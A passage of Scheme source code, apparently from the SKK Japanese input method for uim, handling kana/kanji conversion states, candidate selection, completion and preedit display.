(charcode->string (+ c 32)))
((ichar-lower-case? c)
(charcode->string (- c 32)))
(else
(caar l)))))))
(if (not (null? sl))
(string-append (skk-conv-opposite-case (cdr sl))
(get-opposite-case-str sl))
""))))
(define skk-opposite-kana
(lambda (kana)
(cond
((= kana skk-type-hiragana)
skk-type-katakana)
((= kana skk-type-katakana)
skk-type-hiragana)
((= kana skk-type-hankana)
      skk-type-hiragana)))) ; different from ddskk's behavior
(define skk-context-kana-toggle
(lambda (sc)
(let* ((kana (skk-context-kana-mode sc))
(opposite-kana (skk-opposite-kana kana)))
(skk-context-set-kana-mode! sc opposite-kana))))
(define skk-get-string-mode-part
(lambda (sc res type)
(let ((get-str-by-type
(lambda (l)
(cond
((= type skk-type-hiragana)
(car l))
((= type skk-type-katakana)
(car (cdr l)))
((= type skk-type-hankana)
(cadr (cdr l)))))))
(get-str-by-type res))))
(define skk-do-get-string
(lambda (sc str kana)
(if (not (null? str))
(if (string? (car str))
(skk-get-string-mode-part sc str kana)
(string-append
(skk-do-get-string sc (car str) kana)
(skk-do-get-string sc (cdr str) kana)))
"")))
(define skk-get-string
(lambda (sc str kana)
(let ((res (skk-do-get-string sc str kana)))
(if (and res (> (string-length res) 0))
res
#f))))
;;; no longer used
(define skk-get-string-by-mode
(lambda (sc str)
(let ((kana (skk-context-kana-mode sc)))
(skk-get-string sc str kana))))
(define skk-get-nth-candidate
(lambda (sc n)
(let* ((head (skk-context-head sc))
(cand (skk-lib-get-nth-candidate
skk-dic
n
(cons (skk-make-string head skk-type-hiragana)
(skk-context-okuri-head sc))
(skk-make-string (skk-context-okuri sc) skk-type-hiragana)
skk-use-numeric-conversion?)))
(if skk-show-annotation?
cand
(skk-lib-remove-annotation cand)))))
(define skk-get-current-candidate
(lambda (sc)
(skk-get-nth-candidate
sc
(skk-context-nth sc))))
(define skk-get-nth-completion
(lambda (sc n)
(skk-lib-get-nth-completion
skk-dic
n
(skk-make-string (skk-context-head sc) skk-type-hiragana)
skk-use-numeric-conversion?
skk-use-look?)))
(define skk-get-current-completion
(lambda (sc)
(skk-get-nth-completion
sc
(skk-context-completion-nth sc))))
(define skk-commit-raw
(lambda (sc key key-state)
(let ((psc (skk-context-parent-context sc)))
(if (not (null? psc))
(begin
(if (= (skk-context-child-type psc)
skk-child-type-editor)
(skk-editor-commit-raw (skk-context-editor psc) key key-state)
(skk-dialog-commit-raw (skk-context-dialog psc) key key-state)))
(begin
(skk-context-set-commit-raw! sc #t)
(im-commit-raw sc))))))
(define skk-commit-raw-with-preedit-update
(lambda (sc key key-state)
(let ((psc (skk-context-parent-context sc)))
(if (not (null? psc))
(begin
(if (= (skk-context-child-type psc)
skk-child-type-editor)
(skk-editor-commit-raw (skk-context-editor psc) key key-state)
(skk-dialog-commit-raw (skk-context-dialog psc) key key-state)))
(begin
(skk-context-set-commit-raw! sc #f)
(im-commit-raw sc))))))
;; commit string
(define skk-commit
(lambda (sc str)
(let ((psc (skk-context-parent-context sc)))
(if (not (null? psc))
(begin
(if (= (skk-context-child-type psc)
skk-child-type-editor)
(skk-editor-commit (skk-context-editor psc) str)
(skk-dialog-commit (skk-context-dialog psc) str)))
(im-commit sc str)))))
(define skk-prepare-commit-string
(lambda (sc)
(let* ((cand (skk-lib-eval-candidate (skk-lib-remove-annotation (skk-get-current-candidate sc))))
(okuri (skk-make-string (skk-context-okuri sc)
(skk-context-kana-mode sc)))
(appendix (skk-make-string (skk-context-appendix sc)
(skk-context-kana-mode sc)))
(res (string-append cand okuri appendix))
(head (skk-context-head sc)))
(skk-lib-commit-candidate
skk-dic
(cons (skk-make-string head skk-type-hiragana)
(skk-context-okuri-head sc))
(skk-make-string (skk-context-okuri sc) skk-type-hiragana)
(skk-context-nth sc)
skk-use-numeric-conversion?)
(if (> (skk-context-nth sc) 0)
(skk-save-personal-dictionary))
(skk-reset-candidate-window sc)
(skk-flush sc)
res)))
(define skk-purge-candidate
(lambda (sc)
(let ((res (skk-lib-purge-candidate
skk-dic
(cons
(skk-make-string (skk-context-head sc) skk-type-hiragana)
(skk-context-okuri-head sc))
(skk-make-string (skk-context-okuri sc) skk-type-hiragana)
(skk-context-nth sc)
skk-use-numeric-conversion?)))
(if res
(skk-save-personal-dictionary))
(skk-reset-candidate-window sc)
(skk-flush sc)
res)))
(define skk-reset-dcomp-word
(lambda (sc)
(if skk-dcomp-activate?
(skk-context-set-dcomp-word! sc ""))))
(define skk-append-string
(lambda (sc str)
(and
(not (null? str))
(if (not (string? (car str)))
(begin
(skk-append-string sc (car str))
(skk-append-string sc (cdr str)))
#t)
(skk-context-set-head! sc (cons str (skk-context-head sc)))
;;; dcomp
(if skk-dcomp-activate?
(skk-context-set-dcomp-word!
sc
(skk-lib-get-dcomp-word
skk-dic
(skk-make-string
(skk-context-head sc) (skk-context-kana-mode sc))
skk-use-numeric-conversion?
skk-use-look?))))))
(define skk-append-okuri-string
(lambda (sc str)
(and
(not (null? str))
(if (not (string? (car str)))
(begin
(skk-append-okuri-string sc (car str))
(skk-append-okuri-string sc (cdr str))
)
#t)
(skk-context-set-okuri!
sc
(cons str (skk-context-okuri sc))))))
(define skk-append-residual-kana
(lambda (sc)
(let* ((rkc (skk-context-rk-context sc))
(residual-kana (rk-push-key-last! rkc)))
(if residual-kana
(skk-append-string sc residual-kana)))))
(define skk-begin-conversion
(lambda (sc)
(let ((res (skk-lib-get-entry
skk-dic
(skk-make-string (skk-context-head sc) skk-type-hiragana)
(skk-context-okuri-head sc)
(skk-make-string (skk-context-okuri sc)
skk-type-hiragana)
skk-use-numeric-conversion?)))
(if res
(begin
(skk-context-set-nth! sc 0)
(skk-context-set-nr-candidates! sc 0)
(skk-check-candidate-window-begin sc)
(if (skk-context-candidate-window sc)
(im-select-candidate sc 0))
(skk-context-set-state! sc 'skk-state-converting))
(if skk-use-recursive-learning?
(skk-setup-child-context sc skk-child-type-editor)
(skk-flush sc))))))
(define skk-begin-completion
(lambda (sc)
;; get residual 'n'
(if (eq? (skk-context-state sc) 'skk-state-kanji)
(skk-append-residual-kana sc))
(skk-lib-get-completion
skk-dic
(skk-make-string (skk-context-head sc) (skk-context-kana-mode sc))
skk-use-numeric-conversion?
skk-use-look?)
(skk-context-set-completion-nth! sc 0)
(skk-context-set-state! sc 'skk-state-completion)))
(define skk-dcomp-word-tail
(lambda (sc)
(let ((h (skk-make-string (skk-context-head sc) skk-type-hiragana))
(w (skk-context-dcomp-word sc)))
(skk-lib-substring w (string-length h) (string-length w)))))
(define skk-do-update-preedit
(lambda (sc)
(let ((rkc (skk-context-rk-context sc))
(stat (skk-context-state sc))
(csc (skk-context-child-context sc))
(with-dcomp-word? #f))
;; mark
(if (and
(null? csc)
(or
(eq? stat 'skk-state-kanji)
(eq? stat 'skk-state-completion)
(eq? stat 'skk-state-okuri)))
(im-pushback-preedit sc skk-preedit-attr-mode-mark "▽"))
(if (and
(null? csc)
(eq? stat 'skk-state-kcode))
(im-pushback-preedit sc skk-preedit-attr-mode-mark "JIS "))
(if (or
(not (null? csc))
(eq? stat 'skk-state-converting))
(im-pushback-preedit sc skk-preedit-attr-mode-mark "▼"))
;; head without child context
(if (and
(null? csc)
(or
(eq? stat 'skk-state-kanji)
(eq? stat 'skk-state-okuri)
(eq? stat 'skk-state-kcode)))
(let ((h (skk-make-string
(skk-context-head sc)
(skk-context-kana-mode sc))))
(if (string? h)
(im-pushback-preedit
sc skk-preedit-attr-head
h))))
;; dcomp
(if (and
skk-dcomp-activate?
(null? csc)
(eq? stat 'skk-state-kanji)
(not (skk-rk-pending? sc))
(not (string=? (skk-context-dcomp-word sc) "")))
(begin
(if skk-show-cursor-on-preedit?
(im-pushback-preedit sc preedit-cursor ""))
(im-pushback-preedit
sc skk-preedit-attr-dcomp
(skk-dcomp-word-tail sc))
(set! with-dcomp-word? #t)
))
;; conv-body + okuri
(if (and
(eq? stat 'skk-state-converting)
(or
(null? csc)
(and
(not (null? csc))
(= (skk-context-child-type sc) skk-child-type-dialog))))
(begin
(if (or
(eq? skk-candidate-selection-style 'uim)
(and
(eq? skk-candidate-selection-style 'ddskk-like)
(not (skk-context-candidate-window sc))))
(im-pushback-preedit
sc
(bitwise-ior skk-preedit-attr-conv-body
(if skk-show-cursor-on-preedit?
preedit-cursor
preedit-none))
(if skk-show-annotation-in-preedit?
(skk-lib-eval-candidate (skk-get-current-candidate sc))
(skk-lib-eval-candidate
(skk-lib-remove-annotation
(skk-get-current-candidate sc)))))
(im-pushback-preedit
sc
(bitwise-ior skk-preedit-attr-conv-body
(if skk-show-cursor-on-preedit?
preedit-cursor
preedit-none))
""))
(im-pushback-preedit
sc skk-preedit-attr-conv-okuri
(skk-make-string (skk-context-okuri sc)
(skk-context-kana-mode sc)))
(im-pushback-preedit
sc skk-preedit-attr-conv-appendix
(skk-make-string (skk-context-appendix sc)
(skk-context-kana-mode sc)))))
;; head with child context
(if (and
(not (null? csc))
(or
(eq? stat 'skk-state-kanji)
(eq? stat 'skk-state-okuri)
(and
(eq? stat 'skk-state-converting)
(eq? (skk-context-child-type sc) skk-child-type-editor))))
(let ((h '()))
(if skk-use-numeric-conversion?
;; replace numeric string with #
(set! h (skk-lib-replace-numeric
(skk-make-string
(skk-context-head sc)
(skk-context-kana-mode sc))))
(set! h (skk-make-string
(skk-context-head sc)
(skk-context-kana-mode sc))))
(if (string? h)
(im-pushback-preedit
sc skk-preedit-attr-head
h))))
;; completion
(if (and
(eq? stat 'skk-state-completion)
(null? csc))
(let ((comp (skk-get-current-completion sc)))
(im-pushback-preedit
sc skk-preedit-attr-head
(if (not (string=? comp ""))
comp
(skk-make-string
(skk-context-head sc)
(skk-context-kana-mode sc))))))
;; okuri mark
(if (or
(eq? stat 'skk-state-okuri)
(and
(not (null? csc))
(eq? stat 'skk-state-converting)
(not (null? (skk-context-okuri sc)))
(= (skk-context-child-type sc) skk-child-type-editor)))
(begin
(im-pushback-preedit
sc skk-preedit-attr-okuri
(string-append
"*" (skk-make-string (skk-context-okuri sc)
(skk-context-kana-mode sc))))))
;; pending rk
(if (or
(eq? stat 'skk-state-direct)
(eq? stat 'skk-state-latin)
(eq? stat 'skk-state-wide-latin))
(begin
(im-pushback-preedit sc skk-preedit-attr-direct-pending-rk
(rk-pending rkc))
(if skk-show-cursor-on-preedit?
(im-pushback-preedit sc preedit-cursor "")))
(begin
(im-pushback-preedit sc skk-preedit-attr-pending-rk
(rk-pending rkc))
(if (and
(or
(eq? stat 'skk-state-kanji)
(eq? stat 'skk-state-completion)
(eq? stat 'skk-state-okuri)
(eq? stat 'skk-state-kcode))
skk-show-cursor-on-preedit?
(not with-dcomp-word?))
(im-pushback-preedit sc preedit-cursor ""))))
;; child context's preedit
(if (not (null? csc))
(let ((editor (skk-context-editor sc))
(dialog (skk-context-dialog sc)))
(if (= (skk-context-child-type sc) skk-child-type-editor)
(begin
(im-pushback-preedit sc
skk-preedit-attr-child-beginning-mark
skk-child-context-beginning-mark)
(im-pushback-preedit sc
skk-preedit-attr-child-committed
(skk-editor-get-left-string editor)))
(begin
(im-pushback-preedit sc
skk-preedit-attr-child-dialog
skk-child-context-beginning-mark)
(im-pushback-preedit sc
skk-preedit-attr-child-dialog
(skk-dialog-get-left-string dialog))))
(skk-do-update-preedit csc)
(if (= (skk-context-child-type sc) skk-child-type-editor)
(begin
(im-pushback-preedit sc
skk-preedit-attr-child-committed
(skk-editor-get-right-string editor))
(im-pushback-preedit sc
skk-preedit-attr-child-end-mark
skk-child-context-end-mark))
(begin
(im-pushback-preedit sc
skk-preedit-attr-child-dialog
(skk-dialog-get-right-string dialog))
(im-pushback-preedit sc
skk-preedit-attr-child-dialog
skk-child-context-end-mark)))))
)))
(define skk-update-preedit
(lambda (sc)
(if (not (skk-context-commit-raw sc))
(begin
(im-clear-preedit sc)
(skk-do-update-preedit (skk-find-root-context sc))
(im-update-preedit sc))
(skk-context-set-commit-raw! sc #f))))
;; called from skk-editor
(define skk-commit-editor-context
(lambda (sc str)
(let* ((psc (skk-context-parent-context sc))
(okuri (skk-make-string (skk-context-okuri sc)
(skk-context-kana-mode sc)))
(appendix (skk-make-string (skk-context-appendix sc)
(skk-context-kana-mode sc)))
(str (if (not (null? psc))
str
(string-append str okuri appendix))))
(skk-flush sc)
(skk-context-set-child-context! sc '())
(skk-context-set-child-type! sc '())
(skk-commit sc str))))
(define skk-commit-dialog-context
(lambda (sc str)
(let* ((psc (skk-context-parent-context sc))
(okuri (skk-make-string (skk-context-okuri sc)
(skk-context-kana-mode sc)))
(appendix (skk-make-string (skk-context-appendix sc)
(skk-context-kana-mode sc)))
(str (if (not (null? psc))
str
(string-append str okuri appendix))))
(skk-flush sc)
(skk-context-set-child-context! sc '())
(skk-context-set-child-type! sc '())
(skk-commit sc str))))
;; experimental coding style. discussions are welcome -- YamaKen
(define skk-proc-state-direct-no-preedit
(lambda (key key-state sc rkc)
(if skk-use-with-vi?
(if (skk-vi-escape-key? key key-state)
(begin
(skk-context-set-state! sc 'skk-state-latin)
(rk-flush rkc))))
(cond
((or (skk-cancel-key? key key-state)
(skk-backspace-key? key key-state)
(skk-return-key? key key-state))
(skk-commit-raw sc key key-state)
#f)
((skk-wide-latin-key? key key-state)
(skk-context-set-state! sc 'skk-state-wide-latin)
(rk-flush rkc)
#f)
((skk-latin-key? key key-state)
(skk-context-set-state! sc 'skk-state-latin)
(rk-flush rkc)
#f)
((skk-kcode-input-key? key key-state)
(skk-context-set-state! sc 'skk-state-kcode)
(rk-flush rkc)
#f)
((skk-latin-conv-key? key key-state)
(skk-context-set-state! sc 'skk-state-kanji)
(skk-context-set-latin-conv! sc #t)
#f)
((skk-sticky-key? key key-state)
(skk-context-set-state! sc 'skk-state-kanji)
(skk-context-set-latin-conv! sc #f)
#f)
((skk-kanji-mode-key? key key-state)
(skk-context-set-state! sc 'skk-state-kanji)
(skk-context-set-latin-conv! sc #f)
#f)
((skk-hankaku-kana-key? key key-state)
(let* ((kana (skk-context-kana-mode sc))
(new-kana (if (= kana skk-type-hankana)
skk-type-hiragana
skk-type-hankana)))
(skk-context-set-kana-mode! sc new-kana))
#f)
((skk-kana-toggle-key? key key-state)
(skk-context-kana-toggle sc)
#f)
;; bad strategy. see bug #528
((symbol? key)
(skk-commit-raw sc key key-state)
#f)
;; bad strategy. see bug #528
((or
(and
(shift-key-mask key-state)
(not (ichar-graphic? key)))
(control-key-mask key-state)
(alt-key-mask key-state)
(meta-key-mask key-state)
(super-key-mask key-state)
(hyper-key-mask key-state))
(if (not (skk-state-direct-no-preedit-nop-key? key key-state))
(skk-commit-raw sc key key-state))
#f)
(else
#t))))
(define skk-rk-pending?
(lambda (sc)
(if (null? (rk-context-seq (skk-context-rk-context sc)))
#f
#t)))
(define skk-proc-state-direct
(lambda (c key key-state)
(let* ((sc (skk-find-descendant-context c))
(key-str (charcode->string (skk-ichar-downcase key)))
(rkc (skk-context-rk-context sc))
(res #f)
(kana (skk-context-kana-mode sc)))
(and
;; at first, no preedit mode
(if (not (skk-rk-pending? sc))
(skk-proc-state-direct-no-preedit key key-state sc rkc)
#t)
(if (skk-cancel-key? key key-state)
(begin
(skk-flush sc)
#f)
#t)
(if (skk-backspace-key? key key-state)
(begin
(rk-backspace rkc)
#f)
#t)
;; commits "n" as kana according to kana-mode. This is
;; ddskk-compatible behavior.
(if (skk-commit-key? key key-state)
(begin
(set! res (rk-push-key-last! rkc))
#f)
#t)
;; commits "n" as kana according to kana-mode, and send
;; native return
(if (skk-return-key? key key-state)
(begin
(set! res (rk-push-key-last! rkc))
(skk-commit-raw-with-preedit-update sc key key-state)
#f)
#t)
;; Handles "n{L,l,/,\,Q,C-q,C-Q,q}" key sequence as below. This is
;; ddskk-compatible behavior.
;; 1. commits "n" as kana according to kana-mode
;; 2. switch mode by "{L,l,/,\,Q,C-q,C-Q,q}"
(if (and (skk-wide-latin-key? key key-state)
(not (rk-expect-key? rkc key-str)))
(begin
(set! res (rk-push-key-last! rkc))
(skk-context-set-state! sc 'skk-state-wide-latin)
#f)
#t)
(if (and (skk-latin-key? key key-state)
(not (rk-expect-key? rkc key-str)))
(begin
(set! res (rk-push-key-last! rkc))
(skk-context-set-state! sc 'skk-state-latin)
#f)
#t)
(if (and (skk-kcode-input-key? key key-state)
(not (rk-expect-key? rkc key-str)))
(begin
(set! res (rk-push-key-last! rkc))
(skk-context-set-state! sc 'skk-state-kcode)
#f)
#t)
(if (and (skk-latin-conv-key? key key-state)
(not (rk-expect-key? rkc key-str)))
(let* ((residual-kana (rk-push-key-last! rkc)))
(if residual-kana
(skk-commit sc (skk-get-string sc residual-kana kana)))
(skk-context-set-state! sc 'skk-state-kanji)
(skk-context-set-latin-conv! sc #t)
#f)
#t)
(if (and (skk-sticky-key? key key-state)
(not (rk-expect-key? rkc key-str)))
(let* ((residual-kana (rk-push-key-last! rkc)))
(if residual-kana
(skk-commit sc (skk-get-string sc residual-kana kana)))
(skk-context-set-state! sc 'skk-state-kanji)
(skk-context-set-latin-conv! sc #f)
#f)
#t)
(if (and (skk-kanji-mode-key? key key-state)
(not (rk-expect-key? rkc key-str)))
(let* ((residual-kana (rk-push-key-last! rkc)))
(if residual-kana
(skk-commit sc (skk-get-string sc residual-kana kana)))
(skk-context-set-state! sc 'skk-state-kanji)
(skk-context-set-latin-conv! sc #f)
#f)
#t)
(if (and (skk-hankaku-kana-key? key key-state)
(not (rk-expect-key? rkc key-str)))
(let* ((kana (skk-context-kana-mode sc))
(new-kana (if (= kana skk-type-hankana)
skk-type-hiragana
skk-type-hankana)))
(set! res (rk-push-key-last! rkc))
(skk-context-set-kana-mode! sc new-kana)
#f)
#t)
(if (and (skk-kana-toggle-key? key key-state)
(not (rk-expect-key? rkc key-str)))
(begin
(set! res (rk-push-key-last! rkc))
(skk-context-kana-toggle sc)
#f)
#t)
;; Handles "n " key sequence as below. This is ddskk-compatible
;; behavior.
;; 1. commits "n" as kana according to kana-mode
;; 2. commits " " as native space (such as Qt::Key_Space)
;; unless expected rkc list includes " "
(if (and (skk-plain-space-key? key key-state)
(not (rk-expect-key? rkc key-str)))
(begin
(set! res (rk-push-key-last! rkc))
(skk-commit-raw-with-preedit-update sc key key-state)
#f)
#t)
;; bad strategy. see bug #528
;; "<Control>a", "<Alt> ", "<Meta>b" and so on
(if (or
(and
(shift-key-mask key-state)
(not (ichar-graphic? key)))
(control-key-mask key-state)
(alt-key-mask key-state)
(meta-key-mask key-state)
(super-key-mask key-state)
(hyper-key-mask key-state))
(begin
(skk-flush sc)
(skk-commit-raw-with-preedit-update sc key key-state)
#f)
#t)
(if (skk-ichar-upper-case? key)
(if (and
(skk-rk-pending? sc)
(not (rk-current-seq rkc)))
           ;; ddskk-compatible behavior but not in the SKK specification
(let ((str (rk-push-key! rkc (charcode->string
(skk-ichar-downcase key)))))
(skk-context-set-state! sc 'skk-state-kanji)
(if str
(skk-append-string sc str))
#f)
(let* ((residual-kana (rk-push-key-last! rkc)))
;; handle preceding "n"
(if residual-kana
(skk-commit sc (skk-get-string sc residual-kana kana)))
(skk-context-set-state! sc 'skk-state-kanji)
(set! key (skk-ichar-downcase key))
#t))
#t)
;; bad strategy. see bug #528
(if (symbol? key)
(begin
(skk-flush sc)
(skk-commit-raw-with-preedit-update sc key key-state)
#f)
#t)
(begin
(set! res
(rk-push-key!
rkc
key-str))
#t));;and
;; update state
(if (eq? (skk-context-state sc) 'skk-state-kanji)
(begin
(if res
(skk-append-string sc res))))
(if (or
(eq? (skk-context-state sc) 'skk-state-direct)
(eq? (skk-context-state sc) 'skk-state-latin)
(eq? (skk-context-state sc) 'skk-state-wide-latin)
(eq? (skk-context-state sc) 'skk-state-kcode))
(if (and res
(or
(list? (car res))
(not (string=? (car res) ""))))
(skk-get-string sc res kana)
#f)
#f))))
(define skk-sokuon-shiin-char?
(lambda (c)
(and (ichar-alphabetic? c)
(and
(not (= c 97)) ;; a
(not (= c 105)) ;; i
(not (= c 117)) ;; u
(not (= c 101)) ;; e
(not (= c 111)) ;; o
(not (= c 110)))))) ;; n
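;; Illustrative checks (arguments are ASCII character codes):
;;   (skk-sokuon-shiin-char? 116) => #t  ; #\t may start a geminate ("tt")
;;   (skk-sokuon-shiin-char? 97)  => #f  ; #\a is a vowel
;;   (skk-sokuon-shiin-char? 110) => #f  ; #\n is excluded ("nn" is ん)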
(define skk-rk-push-key-match-without-new-seq
(lambda (rkc key)
(let* ((s (rk-context-seq rkc))
(s (cons key s))
(rule (rk-context-rule rkc))
(seq (rk-lib-find-seq (reverse s) rule)))
(if (and
seq
(null? (cdar seq)))
(cadr seq)
#f))))
; see [Anthy-dev: 2646, 2654]
(define skk-commit-with-conv-completion
(lambda (sc)
(cond
((and skk-dcomp-activate?
(not (skk-rk-pending? sc))
(not (string=? (skk-context-dcomp-word sc) "")))
(if (skk-lib-get-entry
skk-dic
(skk-context-dcomp-word sc) "" "" skk-use-numeric-conversion?)
(begin
(skk-string-list-to-context-head
sc
(string-to-list (skk-context-dcomp-word sc)))
(skk-context-set-nth! sc 0)
(skk-commit sc (skk-prepare-commit-string sc)))
(begin
(skk-commit sc (skk-context-dcomp-word sc))
(skk-flush sc))))
((and skk-dcomp-activate?
(skk-rk-pending? sc)
(not (string=? (skk-context-dcomp-word sc) "")))
(skk-append-residual-kana sc)
(if (not (null? (skk-context-head sc)))
(let ((dcomp (skk-lib-get-dcomp-word
skk-dic
(skk-make-string
(skk-context-head sc)
(skk-context-kana-mode sc))
skk-use-numeric-conversion?
skk-use-look?)))
(if (not (string=? dcomp ""))
(begin
(skk-string-list-to-context-head
sc
(string-to-list dcomp))
(if (skk-lib-get-entry
skk-dic
(skk-make-string
(skk-context-head sc) skk-type-hiragana)
""
""
skk-use-numeric-conversion?)
(begin
(skk-context-set-nth! sc 0)
(skk-commit sc (skk-prepare-commit-string sc)))
(begin
(skk-commit sc dcomp)
(skk-flush sc))))
(begin
(if (skk-lib-get-entry
skk-dic
(skk-make-string
(skk-context-head sc) skk-type-hiragana)
""
""
skk-use-numeric-conversion?)
(begin
(skk-context-set-nth! sc 0)
(skk-commit sc (skk-prepare-commit-string sc)))
(begin
(skk-commit sc (skk-make-string
(skk-context-head sc)
(skk-context-kana-mode sc)))
(skk-flush sc))))))))
(else
(skk-append-residual-kana sc)
(if (not (null? (skk-context-head sc)))
(begin
(if (skk-lib-get-entry
skk-dic
(skk-make-string
(skk-context-head sc) skk-type-hiragana)
""
""
skk-use-numeric-conversion?)
(begin
(skk-context-set-nth! sc 0)
(skk-commit sc (skk-prepare-commit-string sc)))
(begin
(skk-commit sc (skk-make-string
(skk-context-head sc)
(skk-context-kana-mode sc)))
(skk-flush sc))))
(skk-flush sc))))))
(define skk-proc-state-kanji
(lambda (c key key-state)
(let* ((sc (skk-find-descendant-context c))
(rkc (skk-context-rk-context sc))
(stat (skk-context-state sc))
(res #f))
(and
;; First, check begin-conv, completion, cancel, backspace,
;; commit, and return keys
(if (skk-begin-conv-key? key key-state)
(begin
(skk-append-residual-kana sc)
(if (not (null? (skk-context-head sc)))
(skk-begin-conversion sc)
(skk-flush sc))
#f)
#t)
(if (skk-begin-completion-key? key key-state)
(begin
(skk-begin-completion sc)
#f)
#t)
(if (skk-cancel-key? key key-state)
(begin
(skk-flush sc)
#f)
#t)
(if (skk-backspace-key? key key-state)
(begin
(if (not (rk-backspace rkc))
(if (> (length (skk-context-head sc)) 0)
(skk-context-set-head! sc (cdr (skk-context-head sc)))
(skk-flush sc)))
;;; dcomp
(if (and
skk-dcomp-activate?
(eq? (skk-context-state sc) 'skk-state-kanji))
(skk-context-set-dcomp-word!
sc
(if (not (skk-rk-pending? sc))
(skk-lib-get-dcomp-word
skk-dic
(skk-make-string
(skk-context-head sc)
(skk-context-kana-mode sc))
skk-use-numeric-conversion?
skk-use-look?)
"")))
#f)
#t)
(if (or
(skk-commit-key? key key-state)
(skk-return-key? key key-state))
(begin
(skk-append-residual-kana sc)
(skk-commit sc (skk-make-string
(skk-context-head sc)
(skk-context-kana-mode sc)))
(skk-flush sc)
(if (not skk-egg-like-newline?)
(if (skk-return-key? key key-state)
(if skk-commit-newline-explicitly?
(skk-commit sc "\n")
(begin
(skk-update-preedit sc)
(skk-proc-state-direct c key key-state)))))
#f)
#t)
(if (skk-begin-conv-with-completion-key? key key-state)
; do uim's own way --ekato. see [Anthy-dev: 2646, 2654]
(begin
(cond
((and skk-dcomp-activate?
(not (skk-rk-pending? sc))
(not (string=? (skk-context-dcomp-word sc) "")))
(let ((sl (string-to-list (skk-context-dcomp-word sc))))
(skk-string-list-to-context-head sc sl)
(skk-begin-conversion sc)))
((and skk-dcomp-activate?
(skk-rk-pending? sc)
(not (string=? (skk-context-dcomp-word sc) "")))
(skk-append-residual-kana sc)
(let ((sl (string-to-list
(skk-lib-get-dcomp-word
skk-dic
(skk-make-string
(skk-context-head sc)
(skk-context-kana-mode sc))
skk-use-numeric-conversion?
skk-use-look?))))
(if (not (null? sl))
(begin
(skk-string-list-to-context-head sc sl)
(skk-begin-conversion sc))
(begin
(if (not (null? (skk-context-head sc)))
(skk-begin-conversion sc)
(skk-flush sc))))))
(else
(skk-append-residual-kana sc)
(if (not (null? (skk-context-head sc)))
(skk-begin-conversion sc)
(skk-flush sc))))
#f)
#t)
(if (skk-commit-with-conv-completion-key? key key-state)
(begin
(skk-commit-with-conv-completion sc)
#f)
#t)
;; Then check latin-conv status before key handling of hiragana/katakana
(if (skk-context-latin-conv sc)
(begin
(cond
((skk-conv-wide-latin-key? key key-state)
;; wide latin conversion
(if (not (null? (skk-context-head sc)))
(begin
(skk-commit sc (skk-conv-wide-latin
(skk-context-head sc)))
(skk-flush sc))))
((skk-conv-opposite-case-key? key key-state)
;; alternative case conversion
(if (not (null? (skk-context-head sc)))
(begin
(skk-commit sc (skk-conv-opposite-case
(skk-context-head sc)))
(skk-flush sc))))
(else
;; append latin string
(begin
(if (ichar-graphic? key)
(let* ((s (charcode->string key))
(p (cons s (cons s (cons s s)))))
(skk-append-string sc p))))))
#f)
#t)
(if (skk-kanji-mode-key? key key-state)
(begin
(skk-append-residual-kana sc)
(if (not (null? (skk-context-head sc)))
(begin
(skk-commit sc (skk-make-string
(skk-context-head sc)
(skk-context-kana-mode sc)))
(skk-flush sc)
(skk-context-set-state! sc 'skk-state-kanji)
(skk-context-set-latin-conv! sc #f)))
#f)
#t)
;; handle Settou-ji
(if (skk-special-midashi-key? key key-state)
(begin
(skk-append-residual-kana sc)
(skk-append-string sc '(">" ">" ">"))
(skk-begin-conversion sc)
#f)
#t)
(if (skk-sticky-key? key key-state)
(if (null? (skk-context-head sc))
(begin
(skk-commit sc (charcode->string key))
(skk-flush sc)
#f)
(begin
(skk-context-set-state! sc 'skk-state-okuri)
#f))
#t)
(if (and (skk-ichar-upper-case? key)
(not (null? (skk-context-head sc))))
(let ((key-str (charcode->string (skk-ichar-downcase key))))
(set! res (skk-rk-push-key-match-without-new-seq rkc key-str))
(if (and
(skk-rk-pending? sc)
(not (rk-current-seq rkc))
res)
          ;; ddskk-compatible behavior but not in the SKK specification
(begin
(skk-context-set-state! sc 'skk-state-okuri)
(skk-context-set-okuri-head-using-alist!
sc
(car (reverse (rk-context-seq rkc))))
(rk-context-set-seq! rkc '())
(skk-append-okuri-string sc res)
(skk-begin-conversion sc)
#f)
(begin
(skk-context-set-state! sc 'skk-state-okuri)
(set! key (skk-ichar-downcase key))
(skk-context-set-okuri-head-using-alist! sc key-str)
(if (and (not (member key skk-set-henkan-point-key)) (skk-sokuon-shiin-char? key))
(begin
(set! res (rk-push-key! rkc key-str))
(if res
(skk-context-set-head! sc
(cons
res
(skk-context-head sc))))))
(skk-append-residual-kana sc)
#t)))
#t)
(if (skk-kana-toggle-key? key key-state)
(begin
(skk-append-residual-kana sc)
(if (not (null? (skk-context-head sc)))
(begin
(skk-commit sc (skk-make-string
(skk-context-head sc)
(skk-opposite-kana
(skk-context-kana-mode sc))))
(skk-flush sc)))
#f)
#t)
(if (skk-hankaku-kana-key? key key-state)
(begin
(skk-append-residual-kana sc)
(if (not (null? (skk-context-head sc)))
(begin
(skk-commit sc (skk-make-string (skk-context-head sc)
skk-type-hankana))
(skk-flush sc)))
#f)
#t)
(begin
(set! key (skk-ichar-downcase key))
(set! stat (skk-context-state sc))
(set! res
(rk-push-key!
rkc
(charcode->string key)))
(and
(if (and
res
skk-auto-start-henkan?
(string-find skk-auto-start-henkan-keyword-list (car res))
(not (null? (skk-context-head sc))))
(begin
(skk-context-set-appendix! sc (list res))
(skk-begin-conversion sc)
#f)
#t)
(if (and res
(eq? stat 'skk-state-kanji)
(or
(list? (car res))
(not (string=? (car res) ""))))
(begin
(skk-append-string sc res)
#t)
#t)
(if (and res
(eq? stat 'skk-state-okuri)
(or
(list? (car res))
(not (string=? (car res) ""))))
(begin
(skk-append-okuri-string sc res)
(skk-begin-conversion sc))))))
#f)))
(define skk-setup-child-context
(lambda (sc type)
(let ((csc (skk-context-new (skk-context-uc sc)
(skk-context-im sc)))
(input-rule (skk-context-input-rule sc)))
(skk-context-set-child-context! sc csc)
(skk-context-set-child-type! sc type)
(skk-context-set-parent-context! csc sc)
(if (= type skk-child-type-editor)
(skk-context-set-state! csc 'skk-state-direct)
(skk-context-set-state! csc 'skk-state-latin))
(skk-set-rule! csc input-rule))))
(define skk-check-candidate-window-begin
(lambda (sc)
(if (and
(not (skk-context-candidate-window sc))
skk-use-candidate-window?
(> (skk-context-nth sc) (- skk-candidate-op-count 2)))
(begin
(skk-context-set-candidate-window! sc #t)
(skk-context-set-nr-candidates!
sc
(skk-lib-get-nr-candidates
skk-dic
(skk-make-string (skk-context-head sc) skk-type-hiragana)
(skk-context-okuri-head sc)
(skk-make-string (skk-context-okuri sc) skk-type-hiragana)
